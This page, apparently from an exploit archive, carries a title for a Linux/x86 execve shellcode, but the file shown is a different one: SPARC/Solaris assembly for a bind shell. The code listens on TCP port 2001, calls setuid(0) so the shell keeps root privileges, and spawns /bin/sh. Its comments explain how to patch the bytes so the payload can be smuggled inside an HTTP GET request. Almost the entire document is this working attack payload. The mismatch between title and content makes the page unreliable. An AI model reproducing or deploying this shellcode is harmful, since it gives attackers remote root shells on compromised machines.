execve(/bin/sh) Polymorphic Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)
87 lines
No EOL
2.3 KiB
NASM
87 lines
No EOL
2.3 KiB
NASM
!!! $Id: sparc-bind.s,v 1.1 2003/03/01 01:10:51 ghandi Exp $
|
|
!!! Bind /bin/sh to TCP port 2001. Calls setuid(0) so /bin/sh won't
|
|
!!! drop privileges. After assembly, change the third byte in the
|
|
!!! trap instructions to 0x38 to avoid having spaces in the input so that
|
|
!!! it may be used in an HTTP GET request. For Solaris/SPARC.
|
|
!!!
|
|
!!! "I've come here to chew bubble-gum and kick ass...And I'm all out of
|
|
!!! bubble gum."
|
|
!!! -- Nada (Roddy Piper), "They Live"
|
|
!!!
|
|
!!! -ghandi < ghandi@mindless.com >
|
|
!!!
|
|
|
|
.global bindsh
|
|
.type bindsh,#function
|
|
|
|
bindsh: sub %sp, 16, %l0 ! struct sockaddr sa;
|
|
|
|
sub %sp, %l0, %l7;
|
|
st %l7, [%sp - 20] ! int sa_len = 16;
|
|
|
|
sub %l7, 14, %o0
|
|
sub %l7, 14, %o1
|
|
xor %l1, %l1, %o2
|
|
xor %l1, %l1, %o3 ! %o3 will be used as a %g0
|
|
sub %l7, 15, %o4
|
|
add %l7, (230 - 16), %g1
|
|
ta 8
|
|
xor %o2, %o0, %l2 ! s = socket(AF_INET, SOCK_STREAM, 0);
|
|
|
|
sth %o1, [%sp - 16] ! sa.sin_family = AF_INET;
|
|
mov 2001, %l6
|
|
sth %l6, [%sp - 14] ! sa.sin_port = 2001;
|
|
st %g0, [%sp - 12] ! sa.sin_addr.s_addr = INADDR_ANY;
|
|
|
|
xor %o3, %l2, %o0
|
|
xor %o3, %l0, %o1
|
|
xor %o3, %l7, %o2
|
|
add %l7, (232 - 16), %g1
|
|
ta 8 ! bind(s, &sa, sa_len);
|
|
|
|
xor %o3, %l2, %o0
|
|
sub %l7, (16 - 5), %o1
|
|
add %l7, (233 - 16), %g1
|
|
ta 8 ! listen(s, SOMAXCONN);
|
|
|
|
xor %o3, %l2, %o0
|
|
xor %o3, %l0, %o1
|
|
sub %sp, 20, %o2
|
|
add %l7, (234 - 16), %g1
|
|
ta 8
|
|
xor %o3, %o0, %l3 ! c = accept(s, &sa, &sa_len);
|
|
|
|
xor %o3, %l3, %o0
|
|
sub %l7, (16 - 9), %o1
|
|
xor %sp, %sp, %o2
|
|
add %l7, (62 - 16), %g1
|
|
ta 8 ! ioctl(c, I_DUP2FD, 0);
|
|
|
|
xor %o3, %l3, %o0
|
|
sub %l7, (16 - 9), %o1
|
|
add %o3, 1, %o2
|
|
add %l7, (62 - 16), %g1
|
|
ta 8 ! ioctl(c, I_DUP2FD, 1);
|
|
|
|
xor %o3, %l3, %o0
|
|
sub %l7, (16 - 9), %o1
|
|
add %o3, 2, %o2
|
|
add %l7, (62 - 16), %g1
|
|
ta 8 ! ioctl(c, I_DUP2FD, 2);
|
|
|
|
xor %sp, %sp, %o0 ! %o0 = 0;
|
|
add %o3, 23, %g1
|
|
ta 8 ! setuid(0);
|
|
set 0x2f62696e, %l0 ! (void*)sh = '/bin';
|
|
set 0x2f736800, %l1 ! (void*)sh + 4 = '/sh0';
|
|
sub %sp, 16, %o0 ! %o0 = '/bin/sh';
|
|
sub %sp, 8, %o1 ! %o1 = {'/bin/sh', NULL};
|
|
xor %sp, %sp, %o2 ! %o2 = NULL;
|
|
std %l0, [%sp - 16]
|
|
st %o0, [%sp - 8] ! argv[0] = sh;
|
|
st %g0, [%sp - 4] ! argv[1] = NULL;
|
|
add %o3, 59, %g1
|
|
ta 8 ! execve(sh, argv, NULL);
|
|
xor %sp, %sp, %o0 ! %o0 = 0;
|
|
add %o3, 160, %g1 ! %g1 = 160;
|
|
ta 8 ! lwp_exit(0) |